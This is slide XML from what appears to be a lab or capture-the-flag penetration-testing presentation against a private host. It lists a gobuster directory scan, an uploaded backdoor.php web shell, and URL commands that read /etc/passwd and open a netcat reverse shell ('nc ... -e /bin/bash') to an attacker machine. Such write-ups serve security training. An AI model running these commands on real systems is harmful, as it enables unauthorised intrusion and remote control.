                <a:spcPct val="115000"/>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This scan revealed information on vulnerable Apache/2.4.10 server that appear to be outdated. This gave us a clue that we could alter the content of the site with code injection.</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="317" name="Google Shape;317;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12900550" y="5684664"/>
            <a:ext cx="10745649" cy="7320811"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="318" name="Google Shape;318;p38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8382600" y="3622425"/>
            <a:ext cx="4150575" cy="3554225"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartOffpageConnector">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E06666"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="214313" dist="85725" dir="2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b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>TARGET 2</a:t>
            </a:r>
            <a:endParaRPr sz="2300" b="1">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192.168.1.115</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22 Open SSH</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80 Open HTTP</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111 Open RPCBind</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139 Open Netbios-SSN</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445 Open Microsoft-DS</a:t>
            </a:r>
            <a:endParaRPr sz="2800" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="319" name="Google Shape;319;p3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5245163" y="2913000"/>
            <a:ext cx="6056425" cy="2662375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="342900" dist="11430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fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="31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14"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="31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16"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="316"/>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19"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="31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17"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="10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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7000">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploitation: Brute-force URL directories and files </a:t>
            </a:r>
            <a:endParaRPr sz="7000">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="326" name="Google Shape;326;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22</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="327" name="Google Shape;327;p39"/>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0896975" y="6430900"/>
            <a:ext cx="12922949" cy="6008674"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="428625" dist="19050" dir="5400000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="328" name="Google Shape;328;p3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2001105" y="2332975"/>
            <a:ext cx="11576144" cy="3174825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="428625" dist="19050" dir="5400000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="329" name="Google Shape;329;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1085850" y="2552800"/>
            <a:ext cx="108015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b="1">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="CCCCCC"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>&lt;Flag1&gt; a2c1f66d2b8051bd3a5874b5b6e43e21</a:t>
            </a:r>
            <a:endParaRPr sz="2800" b="1">
              <a:solidFill>
                <a:srgbClr val="1155CC"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="CCCCCC"/>
              </a:highlight>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3300" b="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Exploit used: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" b="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Brute-forceable URL directories and files</a:t>
            </a:r>
            <a:endParaRPr sz="2800" b="1">
              <a:solidFill>
                <a:srgbClr val="1155CC"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="330" name="Google Shape;330;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1123950" y="4257675"/>
            <a:ext cx="9363000" cy="8181900"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="AFCA54"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="3571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b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Steps &amp; Commands:</a:t>
            </a:r>
            <a:endParaRPr sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-406400" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>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Performed in-depth enumeration with gobuster with command:</a:t>
            </a:r>
            <a:endParaRPr sz="28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900" b="1">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>&gt;gobuster dir -e -u http://192.168.1.115/vendor -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt</a:t>
            </a:r>
            <a:endParaRPr sz="2800" b="1">
              <a:solidFill>
                <a:srgbClr val="1155CC"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-406400" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>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gobuster revealed the URL which include the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/vendor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> directory.</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-406400" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>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By navigating to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>http://192.168.1.115/vendor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> and search through different directories PATH, we revealed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>flag1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Command:</a:t>
            </a:r>
            <a:endParaRPr sz="28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2800">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en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>&gt;http://192.168.1.115/vendor/PATH</a:t>
            </a:r>
            <a:endParaRPr sz="2800" b="1">
              <a:solidFill>
                <a:srgbClr val="1155CC"/>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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33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27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32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29"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="329"/>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28"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="10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0"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32800" y="0"/>
            <a:ext cx="248073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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7000">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploitation: Reverse shell/remote execution vulnerability</a:t>
            </a:r>
            <a:endParaRPr sz="7000">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="337" name="Google Shape;337;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23</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="338" name="Google Shape;338;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1085850" y="4686400"/>
            <a:ext cx="225603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1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Exploit steps:</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-406400" algn="l" rtl="0">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Use provided script exploit.sh to exploit this vulnerability by opening an Netcat connection to Kali VM</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-406400" algn="l" rtl="0">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Edit the script that sets the TARGET variable to “Target 2” IP 192.168.1.115</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-406400" algn="l" rtl="0">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Run the script and it uploaded backdoor.php file to a target server.</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-406400" algn="l" rtl="0">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This file was used to execute command injection attack.</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-406400" algn="l" rtl="0">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Navigate to URL and use bash commands</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-406400" algn="l" rtl="0">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Used the backdoor to open a shell session on the target</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-406400" algn="l" rtl="0">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Using the shell we opened on “Target 2” we found the flag in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/var/www</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="339" name="Google Shape;339;p40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2143000"/>
            <a:ext cx="22244700" cy="867000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="0" rIns="1219000" bIns="243797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5000" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reverse shell/remote execution vulnerability</a:t>
            </a:r>
            <a:endParaRPr sz="5000" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="5000" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="340" name="Google Shape;340;p4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829250" y="3260125"/>
            <a:ext cx="11816901" cy="1547275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="357188" dist="28575" dir="5400000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="341" name="Google Shape;341;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200150" y="8442700"/>
            <a:ext cx="22244700" cy="4558800"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="AFCA54"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="357188" dist="285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800" b="1">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>&gt;nano exploit.sh</a:t>
            </a:r>
            <a:endParaRPr sz="2800" b="1">
              <a:solidFill>
                <a:srgbClr val="1155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800" b="1">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>&gt;chmod +x exploit.sh</a:t>
            </a:r>
            <a:endParaRPr sz="2800" b="1">
              <a:solidFill>
                <a:srgbClr val="1155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800" b="1">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>&gt;./exploish.sh </a:t>
            </a:r>
            <a:endParaRPr sz="2800" b="1">
              <a:solidFill>
                <a:srgbClr val="1155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800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>After executing a bash script from the command line, in the browser next we executed a test script that opens a bash shell on the port 4444: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>&gt;http://192.168.1.115/backdoor.php?cmd=cat%20/etc/passwd nc%20192.168.1.90%204444%20-e%20/bin/bash</a:t>
            </a:r>
            <a:endParaRPr sz="2800" b="1">
              <a:solidFill>
                <a:srgbClr val="1155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800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>next on Kali we created a listener:</a:t>
            </a:r>
            <a:endParaRPr sz="28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800" b="1">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>&gt; nc -lnvp 4444</a:t>
            </a:r>
            <a:endParaRPr sz="2800" b="1">
              <a:solidFill>
                <a:srgbClr val="1155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800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>In the browser use the backdoor to run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>&gt;http://192.168.1.115/backdoor.php?cmd=nc%20192.168.1.90%204444%20-e%20/bin/bash</a:t>
            </a:r>
            <a:endParaRPr sz="2800" b="1">
              <a:solidFill>
                <a:srgbClr val="1155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800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Using the opened shell we went to /var/www/html and cat flag2.txt</a:t>
            </a:r>
            <a:endParaRPr sz="28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342" name="Google Shape;342;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1041400" y="3217325"/>
            <a:ext cx="10922100" cy="112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3300" b="1">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="CCCCCC"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
